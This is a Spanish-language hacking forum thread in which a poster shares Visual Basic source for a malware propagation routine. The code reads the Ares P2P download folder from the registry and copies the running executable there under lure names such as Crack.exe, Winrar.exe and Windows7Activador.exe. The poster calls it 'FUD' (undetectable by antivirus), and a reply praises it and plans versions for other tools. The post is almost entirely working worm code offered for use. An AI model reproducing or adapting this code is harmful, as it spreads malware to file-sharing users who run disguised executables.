Bueno, sin mas aca les dejo esta pequeña funcion para expandir nuestro ejecutable via Ares:

Código: Seleccionar todo

'/**********************************************\
'/ Autor: k0ws                                 *\
'/ Webs: Underc[0]de.org & Udtools.net         *\
'/ Funcion: Propagar ejecutable via Ares       *\
'/ Anexo: El autor se exime de su mal uso      *\
'/ Uso: Call sAres()                           *\
'/ Si usas este o parte del codigo da creditos *\
'/**********************************************\
 
Public Function sAres()
'Por si las moscas x)
On Error GoTo erroneo
'Definimos lo necesario (Rutas,nombres y el contador)
Dim n As Integer
Dim lector, ruta As String, rutaCom As String, listaNombres As String, nombresF() As String
'Leemos la ruta donde Ares guarda las descargas y la convertimos de Hexadecimal a Texto
Set lector = CreateObject("wscript.shell")
ruta = lector.RegRead("HKEY_CURRENT_USER\SOFTWARE\Ares\Download.Folder")
rutaCom = sConvert(ruta)
'Lista de nombres para autocopiarnos
listaNombres = "Crack.exe,Serial.exe,Winrar.exe,Winzip.exe,PhotoScape.exe,LiveMessenger2012.exe," _
& "DiabloIII.exe,DriverPackSolution.exe,MicrosoftOffice2010.exe,AdobePhotoshopCS6.exe,Activador.exe" _
& ",WindowsXPActivador.exe,Windows7Activador.exe"
'Nos copiammos usando un pequeño contador para el split ;)
For n = 0 To 12
nombresF() = Split(listaNombres, ",")
FileCopy App.Path & "\" & App.EXEName & ".exe", rutaCom & "\" & nombresF(n)
Next
erroneo:
End
End Function
 
Public Function sConvert(ByVal hextext As String) As String 'Funcion para convertir Hexadecimal a exto
    For y = 1 To Len(hextext)
    num = Mid(hextext, y, 2)
    Value = Value & Chr(Val("&h" & num))
    y = y + 1
Next y
sConvert = Value
End Function
Esta complementamente FUD, cuidenla
Para la proxima le añadire un cambio de MD5, de momento les dejo esta.

-Saludos-
Hey Community & K0ws

Looks Nice....

Thanks for the Post.. Publishing !!
-Good work.... ==>Every Source-Code is Still wellcome and usefull !!!
It´s a Good, even old Idea, and will work,of course on manny other Tools, too...

I belive i will code something same 4 other tools...

I comming flesh From the Holiday...

Now i can Work on coding 4 something 2 show.. Release Here on Forum and for the community !! ...
+2 be an Accepted User of the Community & ==>Not (only a Kid that will Grab the Tool´s ) The Opposit is the case !!!

________...
Ps. i Will Searsh My Accound from 2006.. i must Have a look to find my OLD Account and the Pw ;.(
-But no problem.. i thing i wil be show My skills, without the Date since im on the Forum (2006)=>But now new Acc... ^^(Lost My Pw/ Acc)..
............
Ps. Write Me 4 Tool Wishes...

+If u an Old-Skooler (Top Poster -ViP) from (THE OLD) Rat-Boad (were it was still in Underground) and => NOT THE TIME were it was -Full Kiddies... Witch will only Grab & Soo...
===>eMail Me ! (if this is the case i think we know us..-->If you under the TOP´s and ViP´s !)==>Write Me !! +We know us ;.) ..+(NeoDark)We 2?

Write Us... Your .. -eXe- eX0R - eXoR....
For the Community - Let´s grow & will make it to a better place
Para la Comunidad - Vamos a crecer y va a llegar a un lugar mejor!
Responder

Volver a “Fuentes”